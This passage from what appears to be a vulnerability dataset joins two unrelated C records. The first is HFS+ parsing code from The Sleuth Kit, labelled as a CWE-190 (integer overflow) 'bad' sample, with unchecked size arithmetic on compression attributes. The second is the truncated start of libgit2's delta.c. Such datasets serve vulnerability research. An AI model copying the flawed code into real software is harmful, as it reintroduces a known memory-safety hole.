// We will need to do something better than this, in the end.
//type = "Data";
/* print the layout if it is non-resident and not "special" */
if (fs_attr->flags & TSK_FS_ATTR_NONRES) {
//NTFS_PRINT_ADDR print_addr;
tsk_fprintf(hFile,
"Type: %s (%" PRIu32 "-%" PRIu16
") Name: %s Non-Resident%s%s%s size: %"
PRIuOFF " init_size: %" PRIuOFF "\n", type,
fs_attr->type, fs_attr->id,
(fs_attr->name) ? fs_attr->name : "N/A",
(fs_attr->flags & TSK_FS_ATTR_ENC) ? ", Encrypted" :
"",
(fs_attr->flags & TSK_FS_ATTR_COMP) ? ", Compressed" :
"",
(fs_attr->flags & TSK_FS_ATTR_SPARSE) ? ", Sparse" :
"", fs_attr->size, fs_attr->nrd.initsize);
if (istat_flags & TSK_FS_ISTAT_RUNLIST) {
if (tsk_fs_attr_print(fs_attr, hFile)) {
tsk_fprintf(hFile, "\nError creating run lists\n");
tsk_error_print(hFile);
tsk_error_reset();
}
}
} // END: non-resident attribute case
else {
tsk_fprintf(hFile,
"Type: %s (%" PRIu32 "-%" PRIu16
") Name: %s Resident%s%s%s size: %"
PRIuOFF "\n",
type,
fs_attr->type,
fs_attr->id,
(fs_attr->name) ? fs_attr->name : "N/A",
(fs_attr->flags & TSK_FS_ATTR_ENC) ? ", Encrypted" :
"",
(fs_attr->flags & TSK_FS_ATTR_COMP) ? ", Compressed" :
"",
(fs_attr->flags & TSK_FS_ATTR_SPARSE) ? ", Sparse" :
"", fs_attr->size);
if (fs_attr->type == TSK_FS_ATTR_TYPE_HFS_COMP_REC) {
if (compressionAttr == NULL) {
compressionAttr = fs_attr;
}
else {
// Problem: there is more than one compression attribute
error_detected(TSK_ERR_FS_CORRUPT,
"hfs_istat: more than one compression attribute");
return 1;
}
}
} // END: else (RESIDENT attribute case)
} // END: for(;;) loop over attributes
} // END: if(fs_file->meta->attr is non-NULL)
if ((entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_COMPRESSED)
&& (compressionAttr == NULL))
tsk_fprintf(hFile,
"WARNING: Compression Flag is set, but there"
" is no compression record for this file.\n");
if (((entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_COMPRESSED) == 0)
&& (compressionAttr != NULL))
tsk_fprintf(hFile,
"WARNING: Compression Flag is NOT set, but there"
" is a compression record for this file.\n");
// IF this is a compressed file
if (compressionAttr != NULL) {
const TSK_FS_ATTR *fs_attr = compressionAttr;
int attrReadResult;
DECMPFS_DISK_HEADER *cmph;
uint32_t cmpType;
uint64_t uncSize;
uint64_t cmpSize = 0;
// Read the attribute. It cannot be too large because it is stored in
// a btree node
char *aBuf = (char *) tsk_malloc((size_t) fs_attr->size);
if (aBuf == NULL) {
error_returned("hfs_istat: space for a compression attribute");
return 1;
}
attrReadResult = tsk_fs_attr_read(fs_attr, (TSK_OFF_T) 0,
aBuf, (size_t) fs_attr->size,
(TSK_FS_FILE_READ_FLAG_ENUM) 0x00);
if (attrReadResult == -1) {
error_returned("hfs_istat: reading the compression attribute");
free(aBuf);
return 1;
}
else if (attrReadResult < fs_attr->size) {
error_detected(TSK_ERR_FS_READ,
"hfs_istat: could not read the whole compression attribute");
free(aBuf);
return 1;
}
// Now, cast the attr into a compression header
cmph = (DECMPFS_DISK_HEADER *) aBuf;
cmpType = tsk_getu32(TSK_LIT_ENDIAN, cmph->compression_type);
uncSize = tsk_getu64(TSK_LIT_ENDIAN, cmph->uncompressed_size);
tsk_fprintf(hFile, "\nCompressed File:\n");
tsk_fprintf(hFile, " Uncompressed size: %llu\n", uncSize);
switch (cmpType) {
case DECMPFS_TYPE_ZLIB_ATTR:
// Data is inline
{
// size of header, with indicator byte if uncompressed
uint32_t off = (cmph->attr_bytes[0] & 0x0F) == 0x0F ? 17 : 16;
cmpSize = fs_attr->size - off;
tsk_fprintf(hFile,
" Data follows compression record in the CMPF attribute\n"
" %" PRIu64 " bytes of data at offset %u, %s compressed\n",
cmpSize, off, off == 16 ? "zlib" : "not");
}
break;
case DECMPFS_TYPE_LZVN_ATTR:
// Data is inline
{
// size of header, with indicator byte if uncompressed
uint32_t off = cmph->attr_bytes[0] == 0x06 ? 17 : 16;
cmpSize = fs_attr->size - off;
tsk_fprintf(hFile,
" Data follows compression record in the CMPF attribute\n"
" %" PRIu64 " bytes of data at offset %u, %s compressed\n",
cmpSize, off, off == 16 ? "lzvn" : "not");
}
break;
case DECMPFS_TYPE_ZLIB_RSRC:
// Data is zlib compressed in the resource fork
tsk_fprintf(hFile,
" Data is zlib compressed in the resource fork\n");
break;
case DECMPFS_TYPE_LZVN_RSRC:
// Data is lzvn compressed in the resource fork
tsk_fprintf(hFile,
" Data is lzvn compressed in the resource fork\n");
break;
default:
tsk_fprintf(hFile, " Compression type is %u: UNKNOWN\n",
cmpType);
}
free(aBuf);
if ((cmpType == DECMPFS_TYPE_ZLIB_RSRC ||
cmpType == DECMPFS_TYPE_LZVN_RSRC)
&& (tsk_getu64(fs->endian, entry.cat.resource.logic_sz) == 0))
tsk_fprintf(hFile,
"WARNING: Compression record indicates compressed data"
" in the RSRC Fork, but that fork is empty.\n");
}
// This will return NULL if there is an error, or if there are no resources
rd = hfs_parse_resource_fork(fs_file);
// TODO: Should check the errnum here to see if there was an error
if (rd != NULL) {
tsk_fprintf(hFile, "\nResources:\n");
while (rd) {
tsk_fprintf(hFile,
" Type: %s \tID: %-5u \tOffset: %-5u \tSize: %-5u \tName: %s\n",
rd->type, rd->id, rd->offset, rd->length, rd->name);
rd = rd->next;
}
}
// This is OK to call with NULL
free_res_descriptor(rd);
tsk_fs_file_close(fs_file);
return 0;
}
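/* Return the default attribute type for a file: DATA for regular files and
* symbolic links, DEFAULT for the HFS+ special files and everything else. */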
static TSK_FS_ATTR_TYPE_ENUM
hfs_get_default_attr_type(const TSK_FS_FILE * a_file)
{
// The HFS+ special files have a default attr type of "Default"
TSK_INUM_T inum = a_file->meta->addr;
if (inum == 3 || // Extents File
inum == 4 || // Catalog File
inum == 5 || // Bad Blocks File
inum == 6 || // Block Map (Allocation File)
inum == 7 || // Startup File
inum == 8 || // Attributes File
inum == 14 || // Not sure if these two will actually work. I don't see
inum == 15) // any code to load the attrs of these files, if they exist.
return TSK_FS_ATTR_TYPE_DEFAULT;
// The "regular" files and symbolic links have a DATA fork with type "DATA"
if (a_file->meta->type == TSK_FS_META_TYPE_REG ||
a_file->meta->type == TSK_FS_META_TYPE_LNK)
// This should be an HFS-specific type.
return TSK_FS_ATTR_TYPE_HFS_DATA;
// We've got to return *something* for every file, so we return this.
return TSK_FS_ATTR_TYPE_DEFAULT;
}
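/* Close an HFS+ file system and free the cached files, directories, and
* locks that were allocated in hfs_open(). */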
static void
hfs_close(TSK_FS_INFO * fs)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
// We'll grab this lock a bit early.
tsk_take_lock(&(hfs->metadata_dir_cache_lock));
fs->tag = 0;
free(hfs->fs);
if (hfs->catalog_file) {
tsk_fs_file_close(hfs->catalog_file);
hfs->catalog_attr = NULL;
}
if (hfs->blockmap_file) {
tsk_fs_file_close(hfs->blockmap_file);
hfs->blockmap_attr = NULL;
}
if (hfs->meta_dir) {
tsk_fs_dir_close(hfs->meta_dir);
hfs->meta_dir = NULL;
}
if (hfs->dir_meta_dir) {
tsk_fs_dir_close(hfs->dir_meta_dir);
hfs->dir_meta_dir = NULL;
}
if (hfs->extents_file) {
tsk_fs_file_close(hfs->extents_file);
hfs->extents_file = NULL;
}
tsk_release_lock(&(hfs->metadata_dir_cache_lock));
tsk_deinit_lock(&(hfs->metadata_dir_cache_lock));
tsk_fs_free((TSK_FS_INFO *)hfs);
}
/* hfs_open - open an hfs file system
*
* Return NULL on error (or not an HFS or HFS+ file system)
* */
TSK_FS_INFO *
hfs_open(TSK_IMG_INFO * img_info, TSK_OFF_T offset,
TSK_FS_TYPE_ENUM ftype, uint8_t test)
{
HFS_INFO *hfs;
unsigned int len;
TSK_FS_INFO *fs;
ssize_t cnt;
TSK_FS_FILE *file; // The root directory, or the metadata directories
TSK_INUM_T inum; // The inum (or CNID) of the metadata directories
int8_t result; // of tsk_fs_path2inum()
tsk_error_reset();
if (TSK_FS_TYPE_ISHFS(ftype) == 0) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("Invalid FS Type in hfs_open");
return NULL;
}
if ((hfs = (HFS_INFO *) tsk_fs_malloc(sizeof(HFS_INFO))) == NULL)
return NULL;
fs = &(hfs->fs_info);
fs->ftype = TSK_FS_TYPE_HFS;
fs->duname = "Allocation Block";
fs->tag = TSK_FS_INFO_TAG;
fs->flags = 0;
fs->img_info = img_info;
fs->offset = offset;
/*
* Read the superblock.
*/
len = sizeof(hfs_plus_vh);
if ((hfs->fs = (hfs_plus_vh *) tsk_malloc(len)) == NULL) {
fs->tag = 0;
tsk_fs_free((TSK_FS_INFO *)hfs);
return NULL;
}
if (hfs_checked_read_random(fs, (char *) hfs->fs, len,
(TSK_OFF_T) HFS_VH_OFF)) {
tsk_error_set_errstr2("hfs_open: superblock");
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
return NULL;
}
/*
* Verify we are looking at an HFS+ image
*/
if (tsk_fs_guessu16(fs, hfs->fs->signature, HFS_VH_SIG_HFSPLUS) &&
tsk_fs_guessu16(fs, hfs->fs->signature, HFS_VH_SIG_HFSX) &&
tsk_fs_guessu16(fs, hfs->fs->signature, HFS_VH_SIG_HFS)) {
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
tsk_error_set_errno(TSK_ERR_FS_MAGIC);
tsk_error_set_errstr("not an HFS+ file system (magic)");
return NULL;
}
/*
* Handle an HFS-wrapped HFS+ image, which is a HFS volume that contains
* the HFS+ volume inside of it.
*/
if (tsk_getu16(fs->endian, hfs->fs->signature) == HFS_VH_SIG_HFS) {
hfs_mdb *wrapper_sb = (hfs_mdb *) hfs->fs;
// Verify that we are setting a wrapper and not a normal HFS volume
if ((tsk_getu16(fs->endian,
wrapper_sb->drEmbedSigWord) == HFS_VH_SIG_HFSPLUS)
|| (tsk_getu16(fs->endian,
wrapper_sb->drEmbedSigWord) == HFS_VH_SIG_HFSX)) {
TSK_FS_INFO *fs_info2;
// offset in sectors to start of first HFS block
uint16_t drAlBlSt =
tsk_getu16(fs->endian, wrapper_sb->drAlBlSt);
// size of each HFS block
uint32_t drAlBlkSiz =
tsk_getu32(fs->endian, wrapper_sb->drAlBlkSiz);
// start of embedded FS
uint16_t startBlock = tsk_getu16(fs->endian,
wrapper_sb->drEmbedExtent_startBlock);
// calculate the offset; 512 here is intentional.
// TN1150 says "The drAlBlSt field contains the offset, in
// 512-byte blocks, of the wrapper's allocation block 0 relative
// to the start of the volume"
TSK_OFF_T hfsplus_offset =
(drAlBlSt * (TSK_OFF_T) 512) +
(drAlBlkSiz * (TSK_OFF_T) startBlock);
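// Worked example with hypothetical values: if drAlBlSt = 3 (512-byte
// blocks), drAlBlkSiz = 4096, and startBlock = 10, the embedded HFS+
// volume starts at 3 * 512 + 10 * 4096 = 42496 bytes into the wrapper.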
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: HFS+/HFSX within HFS wrapper at byte offset %"
PRIuOFF "\n", hfsplus_offset);
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
/* just re-open with the new offset, then record the offset */
if (hfsplus_offset == 0) {
tsk_error_set_errno(TSK_ERR_FS_CORRUPT);
tsk_error_set_errstr("HFS+ offset is zero");
return NULL;
}
fs_info2 =
hfs_open(img_info, offset + hfsplus_offset, ftype, test);
if (fs_info2)
((HFS_INFO *) fs_info2)->hfs_wrapper_offset =
hfsplus_offset;
return fs_info2;
}
else {
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
tsk_error_set_errno(TSK_ERR_FS_MAGIC);
tsk_error_set_errstr
("HFS file systems (other than wrappers HFS+/HFSX file systems) are not supported");
return NULL;
}
}
fs->block_count = tsk_getu32(fs->endian, hfs->fs->blk_cnt);
fs->first_block = 0;
fs->last_block = fs->last_block_act = fs->block_count - 1;
/* this isn't really accurate; fs->block_size reports only the size
of the allocation block; the size of the device block has to be
found from the device (allocation block size should always be
larger than device block size and an even multiple of the device
block size) */
fs->dev_bsize = fs->block_size =
tsk_getu32(fs->endian, hfs->fs->blk_sz);
// determine the last block we have in this image
if (fs->block_size <= 1) {
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
tsk_error_set_errno(TSK_ERR_FS_CORRUPT);
tsk_error_set_errstr("HFS+ allocation block size too small");
return NULL;
}
if ((TSK_DADDR_T) ((img_info->size - offset) / fs->block_size) <
fs->block_count)
fs->last_block_act =
(img_info->size - offset) / fs->block_size - 1;
// Initialize the lock
tsk_init_lock(&(hfs->metadata_dir_cache_lock));
/*
* Set function pointers
*/
fs->inode_walk = hfs_inode_walk;
fs->block_walk = hfs_block_walk;
fs->block_getflags = hfs_block_getflags;
fs->load_attrs = hfs_load_attrs;
fs->get_default_attr_type = hfs_get_default_attr_type;
fs->file_add_meta = hfs_inode_lookup;
fs->dir_open_meta = hfs_dir_open_meta;
fs->fsstat = hfs_fsstat;
fs->fscheck = hfs_fscheck;
fs->istat = hfs_istat;
fs->close = hfs_close;
// lazy loading of block map
hfs->blockmap_file = NULL;
hfs->blockmap_attr = NULL;
hfs->blockmap_cache_start = -1;
hfs->blockmap_cache_len = 0;
fs->first_inum = HFS_ROOT_INUM;
fs->root_inum = HFS_ROOT_INUM;
fs->last_inum = HFS_FIRST_USER_CNID - 1; // we will later increase this
fs->inum_count = fs->last_inum - fs->first_inum + 1;
/* We will load the extents file data when we need it */
hfs->extents_file = NULL;
hfs->extents_attr = NULL;
if (tsk_getu32(fs->endian,
hfs->fs->start_file.extents[0].blk_cnt) == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Optional Startup File is not present.\n");
hfs->has_startup_file = FALSE;
}
else {
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_open: Startup File is present.\n");
hfs->has_startup_file = TRUE;
}
if (tsk_getu32(fs->endian, hfs->fs->ext_file.extents[0].blk_cnt) == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Optional Extents File (and Badblocks File) is not present.\n");
hfs->has_extents_file = FALSE;
}
else {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Extents File (and BadBlocks File) is present.\n");
hfs->has_extents_file = TRUE;
}
if (tsk_getu32(fs->endian, hfs->fs->attr_file.extents[0].blk_cnt) == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Optional Attributes File is not present.\n");
hfs->has_attributes_file = FALSE;
}
else {
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_open: Attributes File is present.\n");
hfs->has_attributes_file = TRUE;
}
/* Load the catalog file though */
if ((hfs->catalog_file =
tsk_fs_file_open_meta(fs, NULL,
HFS_CATALOG_FILE_ID)) == NULL) {
hfs_close(fs);
return NULL;
}
/* cache the data attribute */
hfs->catalog_attr =
tsk_fs_attrlist_get(hfs->catalog_file->meta->attr,
TSK_FS_ATTR_TYPE_DEFAULT);
if (!hfs->catalog_attr) {
hfs_close(fs);
tsk_error_errstr2_concat
(" - Data Attribute not found in Catalog File");
return NULL;
}
// cache the catalog file header
cnt = tsk_fs_attr_read(hfs->catalog_attr, 14,
(char *) &(hfs->catalog_header),
sizeof(hfs_btree_header_record), 0);
if (cnt != sizeof(hfs_btree_header_record)) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
hfs_close(fs);
tsk_error_set_errstr2("hfs_open: Error reading catalog header");
return NULL;
}
if (tsk_getu16(fs->endian, hfs->fs->version) == HFS_VH_VER_HFSPLUS)
hfs->is_case_sensitive = 0;
else if (tsk_getu16(fs->endian, hfs->fs->version) == HFS_VH_VER_HFSX) {
if (hfs->catalog_header.compType == HFS_BT_HEAD_COMP_SENS)
hfs->is_case_sensitive = 1;
else if (hfs->catalog_header.compType == HFS_BT_HEAD_COMP_INSENS)
hfs->is_case_sensitive = 0;
else {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: invalid value (0x%02" PRIx8
") for key compare type; using case-insensitive\n",
hfs->catalog_header.compType);
hfs->is_case_sensitive = 0;
}
}
else {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: unknown HFS+/HFSX version (%" PRIu16 "\n",
tsk_getu16(fs->endian, hfs->fs->version));
hfs->is_case_sensitive = 0;
}
// update the numbers.
fs->last_inum = hfs_find_highest_inum(hfs);
fs->inum_count = fs->last_inum + 1;
snprintf((char *) fs->fs_id, 17, "%08" PRIx32 "%08" PRIx32,
tsk_getu32(fs->endian, hfs->fs->finder_info[HFS_VH_FI_ID1]),
tsk_getu32(fs->endian, hfs->fs->finder_info[HFS_VH_FI_ID2]));
fs->fs_id_used = 16;
/* journal */
fs->jblk_walk = hfs_jblk_walk;
fs->jentry_walk = hfs_jentry_walk;
fs->jopen = hfs_jopen;
fs->name_cmp = hfs_name_cmp;
fs->journ_inum = 0;
/* Creation Times */
// First, the root
file = tsk_fs_file_open_meta(fs, NULL, 2);
if (file != NULL) {
hfs->root_crtime = file->meta->crtime;
hfs->has_root_crtime = TRUE;
tsk_fs_file_close(file);
}
else {
hfs->has_root_crtime = FALSE;
}
file = NULL;
// disable hard link traversal while finding the hard
// link directories themselves (to prevent problems if
// there are hard links in the root directory)
hfs->meta_inum = 0;
hfs->meta_dir_inum = 0;
// Now the (file) metadata directory
// The metadata directory is a sub-directory of the root. Its name begins with four nulls, followed
// by "HFS+ Private Data". The file system parsing code replaces nulls in filenames with UTF8_NULL_REPLACE.
// In the released version of TSK, this replacement is the character '^'.
// NOTE: There is a standard Unicode replacement which is 0xfffd in UTF16 and 0xEF 0xBF 0xBD in UTF8.
// Systems that require the standard definition can redefine UTF8_NULL_REPLACE and UTF16_NULL_REPLACE
// in tsk_hfs.h
hfs->has_meta_crtime = FALSE;
result =
tsk_fs_path2inum(fs,
"/" UTF8_NULL_REPLACE UTF8_NULL_REPLACE UTF8_NULL_REPLACE
UTF8_NULL_REPLACE "HFS+ Private Data", &inum, NULL);
if (result == 0) {
TSK_FS_FILE *file_tmp = tsk_fs_file_open_meta(fs, NULL, inum);
if (file_tmp != NULL) {
hfs->meta_crtime = file_tmp->meta->crtime;
hfs->has_meta_crtime = TRUE;
hfs->meta_inum = inum;
tsk_fs_file_close(file_tmp);
}
}
// Now, the directory metadata directory
// The "directory" metadata directory, where hardlinked directories actually live, is a subdirectory
// of the root. The beginning of the name of this directory is ".HFS+ Private Directory Data" which
// is followed by a carriage return (ASCII 13).
hfs->has_meta_dir_crtime = FALSE;
result =
tsk_fs_path2inum(fs, "/.HFS+ Private Directory Data\r", &inum,
NULL);
if (result == 0) {
TSK_FS_FILE *file_tmp = tsk_fs_file_open_meta(fs, NULL, inum);
if (file_tmp != NULL) {
hfs->metadir_crtime = file_tmp->meta->crtime;
hfs->has_meta_dir_crtime = TRUE;
hfs->meta_dir_inum = inum;
tsk_fs_file_close(file_tmp);
}
}
if (hfs->has_root_crtime && hfs->has_meta_crtime
&& hfs->has_meta_dir_crtime) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Creation times for key folders have been read and cached.\n");
}
if (!hfs->has_root_crtime) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_open: Warning: Could not open the root directory. "
"Hard link detection and some other functions will be impaired\n");
}
else if (tsk_verbose) {
tsk_fprintf(stderr,
"hfs_open: The root directory is accessible.\n");
}
if (tsk_verbose) {
if (hfs->has_meta_crtime)
tsk_fprintf(stderr,
"hfs_open: \"/^^^^HFS+ Private Data\" metadata folder is accessible.\n");
else
tsk_fprintf(stderr,
"hfs_open: Optional \"^^^^HFS+ Private Data\" metadata folder is not accessible, or does not exist.\n");
if (hfs->has_meta_dir_crtime)
tsk_fprintf(stderr,
"hfs_open: \"/HFS+ Private Directory Data^\" metadata folder is accessible.\n");
else
tsk_fprintf(stderr,
"hfs_open: Optional \"/HFS+ Private Directory Data^\" metadata folder is not accessible, or does not exist.\n");
}
// These caches will be set, if they are needed.
hfs->meta_dir = NULL;
hfs->dir_meta_dir = NULL;
return fs;
}
/*
* Error Handling
*/
/**
* Call this when an error is first detected. It sets the error code and it also
* sets the primary error string, describing the lowest level of error. (Actually,
* it appends to the error string.)
*
* If the error code is already set, then this appends to the primary error
* string a hex representation of the new error code, plus the new error message.
*
* @param errnum The desired error code
* @param errstr The format string for the error message
*/
void
error_detected(uint32_t errnum, char *errstr, ...)
{
va_list args;
va_start(args, errstr);
{
TSK_ERROR_INFO *errInfo = tsk_error_get_info();
char *loc_errstr = errInfo->errstr;
if (errInfo->t_errno == 0)
errInfo->t_errno = errnum;
else {
//This should not happen! We don't want to wipe out the existing error
//code, so we write the new code into the error string, in hex.
int sl = strlen(loc_errstr);
snprintf(loc_errstr + sl, TSK_ERROR_STRING_MAX_LENGTH - sl,
" Next errnum: 0x%x ", errnum);
}
if (errstr != NULL) {
int sl = strlen(loc_errstr);
vsnprintf(loc_errstr + sl, TSK_ERROR_STRING_MAX_LENGTH - sl,
errstr, args);
}
}
va_end(args);
}
/**
* Call this when a called TSK function returns an error. Presumably, that
* function will have set the error code and the primary error string. This
* *appends* to the secondary error string. It should be called to describe
* the context of the call. If no error code has been set, then this sets a
* default code so that it is not zero.
*
* @param errstr The format string for the error message
*/
void
error_returned(char *errstr, ...)
{
va_list args;
va_start(args, errstr);
{
TSK_ERROR_INFO *errInfo = tsk_error_get_info();
char *loc_errstr2 = errInfo->errstr2;
if (errInfo->t_errno == 0)
errInfo->t_errno = TSK_ERR_AUX_GENERIC;
if (errstr != NULL) {
int sl = strlen(loc_errstr2);
vsnprintf(loc_errstr2 + sl, TSK_ERROR_STRING_MAX_LENGTH - sl,
errstr, args);
}
}
va_end(args);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_711_0 |
crossvul-cpp_data_good_111_0 | /*
* Copyright (C) the libgit2 contributors. All rights reserved.
*
* This file is part of libgit2, distributed under the GNU GPL v2 with
* a Linking Exception. For full terms see the included COPYING file.
*/
#include "delta.h"
/* maximum hash entry list for the same hash bucket */
#define HASH_LIMIT 64
#define RABIN_SHIFT 23
#define RABIN_WINDOW 16
static const unsigned int T[256] = {
0x00000000, 0xab59b4d1, 0x56b369a2, 0xfdeadd73, 0x063f6795, 0xad66d344,
0x508c0e37, 0xfbd5bae6, 0x0c7ecf2a, 0xa7277bfb, 0x5acda688, 0xf1941259,
0x0a41a8bf, 0xa1181c6e, 0x5cf2c11d, 0xf7ab75cc, 0x18fd9e54, 0xb3a42a85,
0x4e4ef7f6, 0xe5174327, 0x1ec2f9c1, 0xb59b4d10, 0x48719063, 0xe32824b2,
0x1483517e, 0xbfdae5af, 0x423038dc, 0xe9698c0d, 0x12bc36eb, 0xb9e5823a,
0x440f5f49, 0xef56eb98, 0x31fb3ca8, 0x9aa28879, 0x6748550a, 0xcc11e1db,
0x37c45b3d, 0x9c9defec, 0x6177329f, 0xca2e864e, 0x3d85f382, 0x96dc4753,
0x6b369a20, 0xc06f2ef1, 0x3bba9417, 0x90e320c6, 0x6d09fdb5, 0xc6504964,
0x2906a2fc, 0x825f162d, 0x7fb5cb5e, 0xd4ec7f8f, 0x2f39c569, 0x846071b8,
0x798aaccb, 0xd2d3181a, 0x25786dd6, 0x8e21d907, 0x73cb0474, 0xd892b0a5,
0x23470a43, 0x881ebe92, 0x75f463e1, 0xdeadd730, 0x63f67950, 0xc8afcd81,
0x354510f2, 0x9e1ca423, 0x65c91ec5, 0xce90aa14, 0x337a7767, 0x9823c3b6,
0x6f88b67a, 0xc4d102ab, 0x393bdfd8, 0x92626b09, 0x69b7d1ef, 0xc2ee653e,
0x3f04b84d, 0x945d0c9c, 0x7b0be704, 0xd05253d5, 0x2db88ea6, 0x86e13a77,
0x7d348091, 0xd66d3440, 0x2b87e933, 0x80de5de2, 0x7775282e, 0xdc2c9cff,
0x21c6418c, 0x8a9ff55d, 0x714a4fbb, 0xda13fb6a, 0x27f92619, 0x8ca092c8,
0x520d45f8, 0xf954f129, 0x04be2c5a, 0xafe7988b, 0x5432226d, 0xff6b96bc,
0x02814bcf, 0xa9d8ff1e, 0x5e738ad2, 0xf52a3e03, 0x08c0e370, 0xa39957a1,
0x584ced47, 0xf3155996, 0x0eff84e5, 0xa5a63034, 0x4af0dbac, 0xe1a96f7d,
0x1c43b20e, 0xb71a06df, 0x4ccfbc39, 0xe79608e8, 0x1a7cd59b, 0xb125614a,
0x468e1486, 0xedd7a057, 0x103d7d24, 0xbb64c9f5, 0x40b17313, 0xebe8c7c2,
0x16021ab1, 0xbd5bae60, 0x6cb54671, 0xc7ecf2a0, 0x3a062fd3, 0x915f9b02,
0x6a8a21e4, 0xc1d39535, 0x3c394846, 0x9760fc97, 0x60cb895b, 0xcb923d8a,
0x3678e0f9, 0x9d215428, 0x66f4eece, 0xcdad5a1f, 0x3047876c, 0x9b1e33bd,
0x7448d825, 0xdf116cf4, 0x22fbb187, 0x89a20556, 0x7277bfb0, 0xd92e0b61,
0x24c4d612, 0x8f9d62c3, 0x7836170f, 0xd36fa3de, 0x2e857ead, 0x85dcca7c,
0x7e09709a, 0xd550c44b, 0x28ba1938, 0x83e3ade9, 0x5d4e7ad9, 0xf617ce08,
0x0bfd137b, 0xa0a4a7aa, 0x5b711d4c, 0xf028a99d, 0x0dc274ee, 0xa69bc03f,
0x5130b5f3, 0xfa690122, 0x0783dc51, 0xacda6880, 0x570fd266, 0xfc5666b7,
0x01bcbbc4, 0xaae50f15, 0x45b3e48d, 0xeeea505c, 0x13008d2f, 0xb85939fe,
0x438c8318, 0xe8d537c9, 0x153feaba, 0xbe665e6b, 0x49cd2ba7, 0xe2949f76,
0x1f7e4205, 0xb427f6d4, 0x4ff24c32, 0xe4abf8e3, 0x19412590, 0xb2189141,
0x0f433f21, 0xa41a8bf0, 0x59f05683, 0xf2a9e252, 0x097c58b4, 0xa225ec65,
0x5fcf3116, 0xf49685c7, 0x033df00b, 0xa86444da, 0x558e99a9, 0xfed72d78,
0x0502979e, 0xae5b234f, 0x53b1fe3c, 0xf8e84aed, 0x17bea175, 0xbce715a4,
0x410dc8d7, 0xea547c06, 0x1181c6e0, 0xbad87231, 0x4732af42, 0xec6b1b93,
0x1bc06e5f, 0xb099da8e, 0x4d7307fd, 0xe62ab32c, 0x1dff09ca, 0xb6a6bd1b,
0x4b4c6068, 0xe015d4b9, 0x3eb80389, 0x95e1b758, 0x680b6a2b, 0xc352defa,
0x3887641c, 0x93ded0cd, 0x6e340dbe, 0xc56db96f, 0x32c6cca3, 0x999f7872,
0x6475a501, 0xcf2c11d0, 0x34f9ab36, 0x9fa01fe7, 0x624ac294, 0xc9137645,
0x26459ddd, 0x8d1c290c, 0x70f6f47f, 0xdbaf40ae, 0x207afa48, 0x8b234e99,
0x76c993ea, 0xdd90273b, 0x2a3b52f7, 0x8162e626, 0x7c883b55, 0xd7d18f84,
0x2c043562, 0x875d81b3, 0x7ab75cc0, 0xd1eee811
};
static const unsigned int U[256] = {
0x00000000, 0x7eb5200d, 0x5633f4cb, 0x2886d4c6, 0x073e5d47, 0x798b7d4a,
0x510da98c, 0x2fb88981, 0x0e7cba8e, 0x70c99a83, 0x584f4e45, 0x26fa6e48,
0x0942e7c9, 0x77f7c7c4, 0x5f711302, 0x21c4330f, 0x1cf9751c, 0x624c5511,
0x4aca81d7, 0x347fa1da, 0x1bc7285b, 0x65720856, 0x4df4dc90, 0x3341fc9d,
0x1285cf92, 0x6c30ef9f, 0x44b63b59, 0x3a031b54, 0x15bb92d5, 0x6b0eb2d8,
0x4388661e, 0x3d3d4613, 0x39f2ea38, 0x4747ca35, 0x6fc11ef3, 0x11743efe,
0x3eccb77f, 0x40799772, 0x68ff43b4, 0x164a63b9, 0x378e50b6, 0x493b70bb,
0x61bda47d, 0x1f088470, 0x30b00df1, 0x4e052dfc, 0x6683f93a, 0x1836d937,
0x250b9f24, 0x5bbebf29, 0x73386bef, 0x0d8d4be2, 0x2235c263, 0x5c80e26e,
0x740636a8, 0x0ab316a5, 0x2b7725aa, 0x55c205a7, 0x7d44d161, 0x03f1f16c,
0x2c4978ed, 0x52fc58e0, 0x7a7a8c26, 0x04cfac2b, 0x73e5d470, 0x0d50f47d,
0x25d620bb, 0x5b6300b6, 0x74db8937, 0x0a6ea93a, 0x22e87dfc, 0x5c5d5df1,
0x7d996efe, 0x032c4ef3, 0x2baa9a35, 0x551fba38, 0x7aa733b9, 0x041213b4,
0x2c94c772, 0x5221e77f, 0x6f1ca16c, 0x11a98161, 0x392f55a7, 0x479a75aa,
0x6822fc2b, 0x1697dc26, 0x3e1108e0, 0x40a428ed, 0x61601be2, 0x1fd53bef,
0x3753ef29, 0x49e6cf24, 0x665e46a5, 0x18eb66a8, 0x306db26e, 0x4ed89263,
0x4a173e48, 0x34a21e45, 0x1c24ca83, 0x6291ea8e, 0x4d29630f, 0x339c4302,
0x1b1a97c4, 0x65afb7c9, 0x446b84c6, 0x3adea4cb, 0x1258700d, 0x6ced5000,
0x4355d981, 0x3de0f98c, 0x15662d4a, 0x6bd30d47, 0x56ee4b54, 0x285b6b59,
0x00ddbf9f, 0x7e689f92, 0x51d01613, 0x2f65361e, 0x07e3e2d8, 0x7956c2d5,
0x5892f1da, 0x2627d1d7, 0x0ea10511, 0x7014251c, 0x5facac9d, 0x21198c90,
0x099f5856, 0x772a785b, 0x4c921c31, 0x32273c3c, 0x1aa1e8fa, 0x6414c8f7,
